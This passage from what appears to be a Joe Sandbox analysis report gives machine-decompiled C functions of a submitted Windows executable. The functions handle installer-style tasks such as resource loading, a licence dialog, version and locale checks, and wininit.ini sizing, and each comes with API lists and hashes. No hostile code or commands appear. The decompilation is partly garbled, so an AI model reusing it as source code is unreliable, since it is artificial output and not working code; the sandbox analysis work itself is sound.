                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 001F43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 001F440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 001F4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 001F442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 001F443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 001F4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001F44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: 8782593780e11f470a3cdb0b5bfe5db10bc0276b605fbc473430f4d515e66007
                                                                                                                                                                                                        • Instruction ID: f514ca81197ad17c158427381925d068fb1bf0e8b39806e8bf6e3887dc8dfb01
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8782593780e11f470a3cdb0b5bfe5db10bc0276b605fbc473430f4d515e66007
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9311772A00119AFCB14CFB8DD899FEBBB9EF89310F554169F905B3250DA34AD45CB60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E001F6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E001F171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0x1fa288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E001F171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E001F6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F171E: _vsnprintf.MSVCRT ref: 001F1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 001F6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: 632c99a07f5646e912cf4a2ccfa076675c183b6233e5b5d47103aee2ee91796b
                                                                                                                                                                                                        • Instruction ID: b3fa8fe0ea66f90fdfc7bfd3e9fe6e6ada3d215829773bc2ccb687148f9dbce6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 632c99a07f5646e912cf4a2ccfa076675c183b6233e5b5d47103aee2ee91796b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF21F6B5A0021DABDB149F649C459BE7B7CFF45710B010119FA0AA3641DB399D42CBE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0x1f81d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0x1f81d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0x1f81d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0x1f1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E001F66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0x1f81d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001F686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 001F68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001F68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,?,0000000C), ref: 001F68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 001F6902
                                                                                                                                                                                                          • Part of subcall function 001F66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,001F691A), ref: 001F6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 001F68C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: 2676481d25a0446c4ab92669b80a27c413ae22b8c4ce7d62e731b9cadbf8ed7d
                                                                                                                                                                                                        • Instruction ID: 24fecf849729397229222a6e7a4038e0860f7b8f8917ccfc2c714899ce44f24d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2676481d25a0446c4ab92669b80a27c413ae22b8c4ce7d62e731b9cadbf8ed7d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB314C71A0021C9FDB219F11DC45BBAB7B8FB45768F4001A5EA4DA2140DB709A85CB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F3A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E001F468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0x1f8d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E001F468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0x1f8d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0x1f8d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0x1f9124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E001F6517(_t19, 0x7d1, 0, E001F3100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0x1f8d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1f9124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0x1f8d4c);
                                                                                                                                                                                                        					 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001F2F64,?,00000002,00000000), ref: 001F3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 001F3AB3
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 001F3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 001F3B13
                                                                                                                                                                                                          • Part of subcall function 001F6517: FindResourceA.KERNEL32(001F0000,000007D6,00000005), ref: 001F652A
                                                                                                                                                                                                          • Part of subcall function 001F6517: LoadResource.KERNEL32(001F0000,00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001F6538
                                                                                                                                                                                                          • Part of subcall function 001F6517: DialogBoxIndirectParamA.USER32(001F0000,00000000,00000547,001F19E0,00000000), ref: 001F6557
                                                                                                                                                                                                          • Part of subcall function 001F6517: FreeResource.KERNEL32(00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001F6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,001F3100,00000000,00000000), ref: 001F3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 293ba30cfe3f700b283a1fb6878a1d768359335bc46f26021002eed42bc8766a
                                                                                                                                                                                                        • Instruction ID: 4c2c8db29e6bf1f79268880314dae6466473df69b38aff1fb97a154a6ad800d0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 293ba30cfe3f700b283a1fb6878a1d768359335bc46f26021002eed42bc8766a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8911E6B0304209ABD724AF76AC19F3B7AB9EFD5750B10413EB745E6AA1DF798840C660
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F24E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E001F658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 001F2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 001F252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 001F253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 001F254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 001F2555
                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: 4aaa0fb6200e43d33d631d4be393c36012f6f4de7799e7546b18fc60c65a70c4
                                                                                                                                                                                                        • Instruction ID: de57f0b945fac07fd96e503844f1663e6b35473f415d65ec4e9228b0e527c3ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aaa0fb6200e43d33d631d4be393c36012f6f4de7799e7546b18fc60c65a70c4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301927260011867C7209B65AC09EFB7B7CDF95750F400155FA49D3190DF788E85CA95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E001F36EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
